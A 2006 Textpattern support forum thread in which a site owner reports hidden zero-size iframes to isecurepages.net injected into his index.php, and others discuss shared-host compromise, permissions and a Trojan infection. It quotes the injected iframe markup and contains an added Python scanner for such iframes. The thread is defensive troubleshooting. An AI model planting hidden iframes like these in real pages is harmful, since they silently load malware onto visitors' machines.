Textpattern CMS support forum
Weird iSecurePages code in index.php
Hi,
this code appeared in my index.php (on http://www.onrails.be)
<iframe src="http://www.isecurepages.net/out.php?s_id=1" width=0 height=0></iframe>
<iframe src="http://isecurepages.net/out.php?s_id=11" width=0 height=0></iframe>
I didn’t add it myself.
In fact, I already deleted it a while ago (because it makes my site fail its XHTML validation).
But it re-appeared.
Does anybody know what this is?
Is it textpattern-related?
Hosting related?
It certainly is weird…
regards,
Johan.
Last edited by johan_vm (2006-11-22 18:02:07)
Dutch Ruby on Rails news and articles: OnRails
Re: Weird iSecurePages code in index.php
Johan,
I did a quick search for isecurepages.net and the first couple links point to websites that had been hacked.
What version of Textpattern are you running right now? According to the amazing TXP FAQ, “there is no confirmed report of a successfully exploited security hole in a properly maintained TXP website.” I would contact your hosting company to inform them and to take a look into the issue.
Re: Weird iSecurePages code in index.php
this code appeared in my index.php
Inside the file index.php? Then it likely has nothing to do with Textpattern, because Textpattern usually doesn’t write to files; on most server environments PHP wouldn’t even have the rights to write to that file.
It could well be a server-thing. Are you maintaining the server, or are you on a shared server?
Re: Weird iSecurePages code in index.php
I’m on a shared server, but my host is 1-eurohost.com, located in Brussels.
Textpattern does print out this warning in the admin interface:
De PHP versie die U gebruikt kan een veiligheids risico veroorzaken. Zet register_globals uit of gebruik een nieuwere versie van PHP.
Meaning:
There’s a safety risk in your PHP version. Turn off register_globals, or upgrade to a newer version.
So this could be malicious code?
Can it really mess up my TXP install?
regards,
Johan.
Dutch Ruby on Rails news and articles: OnRails
#6 2006-11-23 21:12:24
- zem
- Developer Emeritus

- From: Melbourne, Australia
- Registered: 2004-04-08
- Posts: 2,579
Re: Weird iSecurePages code in index.php
If you’re running a stock copy of 4.0.3 or 4.0.4 it’s unlikely it was hacked, even with register_globals turned on, though not impossible of course.
Every case of a “hacked” Textpattern install we’ve investigated has turned out to be caused by some other PHP or CGI script installed in the same account, or a global server attack against Apache.
If you have other scripts installed, take note of the version numbers and update or remove them. Talk to your hosting company, find out if the server was attacked, or if they know of attacks against any of those scripts.
Can you tell us whether your front page “index.php” is handled by Textpattern, or is it a custom index.php script you’ve written yourself? Where is the bogus link code stored – is it inside a Textpattern page template, in a file..?
If you do find any information about a potential security hole in Textpattern, please don’t post it on the forum – contact Team Textpattern directly, or ask your hosting company to contact us.
Last edited by zem (2006-11-23 21:17:48)
Alex
Re: Weird iSecurePages code in index.php
that kind of hack has happened to me before.
it’s a file permissions problem, which arises when your ftp client uploads files (in this case index.php of txp) with a custom preference set to changing the file permissions. try narrowing down the permissions manually on your index.php until it appears inaccessible for a browser. then change them back to the last state before.
i don’t remember the exact permissions, which i had to reset after a bunch of websites of mine got defaced.
alex, do you have a hint for this?
A hole turned upside down is a dome, when there’s also gravity.
#8 2006-11-24 22:29:42
- zem
- Developer Emeritus

- From: Melbourne, Australia
- Registered: 2004-04-08
- Posts: 2,579
Re: Weird iSecurePages code in index.php
A hint about what?
Permissions alone aren’t the problem. They might be an important part of the hack, but there still has to be a buggy script or other software that allows the attackers to take advantage of the file permissions.
Again: we need to know where the bogus link code appears: in a PHP file, a page template, or somewhere else.
Alex
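An added example, not part of any post in this thread: a Python sketch for the question asked above (which files on disk carry the injected markup), walking a web root for iframes with a zero width or height and reporting each file's permission bits. The function names, the extension list and the group/world-writable check are assumptions of this example, and markup stored in a Textpattern page template in the database is not covered by a file scan.

```python
import os
import re
import stat

# Matches an <iframe ...> opening tag; its attributes are inspected separately.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ZERO_DIM_RE = re.compile(
    r"""\b(?:width|height)\s*=\s*["']?0(?:px)?["']?(?=[\s>/])""", re.IGNORECASE)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
EXTENSIONS = (".php", ".html", ".htm", ".inc")  # assumed list, adjust per site


def scan_text(text):
    """Return the src of every iframe in text that has a zero width or height."""
    hits = []
    for tag in IFRAME_RE.findall(text):
        if ZERO_DIM_RE.search(tag):
            src = SRC_RE.search(tag)
            hits.append(src.group(1) if src else "")
    return hits


def scan_tree(root):
    """Walk root; return (path, iframe srcs, octal mode, loosely_writable)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                srcs = scan_text(fh.read())
            if not srcs:
                continue
            mode = stat.S_IMODE(os.stat(path).st_mode)
            # Group- or world-writable files can be rewritten by other accounts
            # on a shared host once some buggy script gives a way in.
            loose = bool(mode & (stat.S_IWGRP | stat.S_IWOTH))
            findings.append((path, srcs, oct(mode), loose))
    return findings


if __name__ == "__main__":
    import sys
    for path, srcs, mode, loose in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path} mode={mode} loosely_writable={loose} iframes={srcs}")
```

A hit in a PHP file points at file-level tampering; no hit while the iframe still shows in the rendered page suggests looking at templates or forms instead.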
#9 2006-11-25 03:15:03
- Mary
- Sock Enthusiast
- Registered: 2004-06-27
- Posts: 6,236
Re: Weird iSecurePages code in index.php
Yikes! Scan your computers everyone, and make sure to block both isecurepages.net and orthone.com from being loaded by your browser. My computer was infected with a Trojan and tracking cookie, and was port scanned.
Re: Weird iSecurePages code in index.php
My computer was infected with a Trojan
What trojan was it?
EDIT: I’m paranoid about things like that so I looked through all my cookies and scanned my computer, but found nothing. Weird huh. Maybe that 29 bucks I spent on outpost is paying for itself.
Last edited by soulship (2006-11-25 16:43:38)
#11 2006-11-26 13:38:41
- Mary
- Sock Enthusiast
- Registered: 2004-06-27
- Posts: 6,236
Re: Weird iSecurePages code in index.php
Don’t remember now. :/
Johan, does the code appear within a page template or…?
#12 2006-11-29 21:41:14
- zem
- Developer Emeritus

- From: Melbourne, Australia
- Registered: 2004-04-08
- Posts: 2,579
Re: Weird iSecurePages code in index.php
Can someone please answer the question?
Where does the isecurepages link appear – in Textpattern page template or form, in a PHP file, or somewhere else?
Alex